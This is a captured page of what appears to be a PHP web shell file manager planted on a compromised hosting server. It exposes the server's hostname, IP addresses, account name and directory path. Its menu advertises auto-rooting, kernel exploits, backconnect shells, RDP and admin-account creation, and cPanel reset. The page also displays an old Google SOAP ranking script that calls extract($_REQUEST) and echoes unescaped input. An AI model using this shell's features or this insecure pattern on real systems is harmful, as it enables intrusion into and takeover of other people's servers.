Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.221.25.133
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
designprovider /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
SOAP
[ DIR ]
drwxr-xr-x
SOAP-old
[ DIR ]
drwxr-xr-x
SOAP-0.13.0.tgz11
84.73
KB
-rw-r--r--
error_log
52.89
KB
-rw-r--r--
goolgle_api_search.txt
3.62
KB
-rw-r--r--
index.php
3.51
KB
-rw-r--r--
package.xml
13.38
KB
-rw-r--r--
phpQuery-onefile.php
163.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : goolgle_api_search.txt
<?php if (isset($_REQUEST['submit'])) { // script does not expire. set_time_limit(0); // If your do not have access to php.ini, set the include path to use the Pear Class. // ini_set( 'include_path', '.:/home/yourname/pear:/usr/local/lib/php'); // PEAR:SOAP Cient Class require_once('SOAP/Client.php'); extract($_REQUEST); // $q = urlencode($_REQUEST['q']); $start = 0; $maxResults = 10; $filter = false; $restrict = ''; $safeSearch = false; $lr = ''; $ie = ''; $oe = ''; $loop = 'true'; $output = ''; echo "Searching your url in Google... <br/>"; function urlSearch($position, &$result) { global $loop; global $output; global $resultLimit; global $maxResults; global $desc; global $q; global $myUrl; // Get total results from the search $count =$result->estimatedTotalResultsCount; // Get the resultElements class $elements = $result->resultElements; // if searched results reach limit set by you, quit loop if ($position == $resultLimit) { echo "You have restricted the search results to $resultLimit"; $loop = false; } else if ($count > 0) { echo "$position records<br/>"; foreach ($elements as $item) { $position++; // if the url is found, display it and quit loop if (preg_match("/$myUrl/i", $item->URL)) { $size = $item->cachedSize; $title = $item->title; $url = $item->URL; $snippet = $item->snippet; $desc .= "<p>$title [Cache Size: $size]<br/> <a href=\"$url\" target=\"_blank\">$url</a><br />"; $desc .= "$snippet</p>"; $output = "<br /> $count results found. Your url is ranked #{$position} for the keyword \"$q\". It will appear on page ".ceil($position/ $maxResults)." in the Google Search Engine. Your listing will appear as follows: <p>$desc</p>"; // now exit the while loop $loop = false; } } } // if google returns no result, quit loop else { $output = "No results found for the keyword \"$q\""; $loop = false; } } while ($loop) { // Instantiate the SOAP_WSDL Class. $wsdl = new SOAP_WSDL('GoogleSearch.wsdl'); // Get the WSDL Proxy Class $soapclient = $wsdl->getProxy(); // Start Google API query $result = $soapclient->doGoogleSearch($key,$q,$start,$maxResults,$filter,$restrict,$safeSearch,$lr,$ie,$oe); // If error occurs if (PEAR::isError($result)) { $message = $result->message; echo "An error occured: $message<p>"; // pause for 15 secs sleep(15); // if too much query, quit loop if (preg_match("/Daily limit/i", $message)) { $loop = false; } // if invalid key, quit loop else if (preg_match("/Invalid/i", $message)){ $loop = false; } // if normal timeout message, continue else { echo "Retrying in 15 secs. <br/>"; } } // if no errors, check occurrence of your url in the results. else { $desc = ""; // Step up the starting record for the next loop $start += $maxResults; // the actual ranking $position = $start- $maxResults; // Search for url urlSearch($position, $result); } } // display the final output echo $output; } ?> <div align="center"><b>Finding your Google Ranking Using Google API & PEAR:SOAP</b></div> <form id="form1" name="form1" method="post" action=""> <p>Your URL: <input type="text" name="myUrl" /> eg. sitecritic.net <br/> Google Api Key: <input type="text" name="key" /> eg. EVwOpLdQFH54lfdgy06Mq1ksCpk/YoYE<br/> Key Word: <input type="text" name="q" /> eg. Website Reviews<br /> Max Results To Search: <input name="resultLimit" type="text" value="500" size="4" /> eg. 500 </p> <p> <input type="submit" name="submit" value="Submit" /> </p> </form>
Close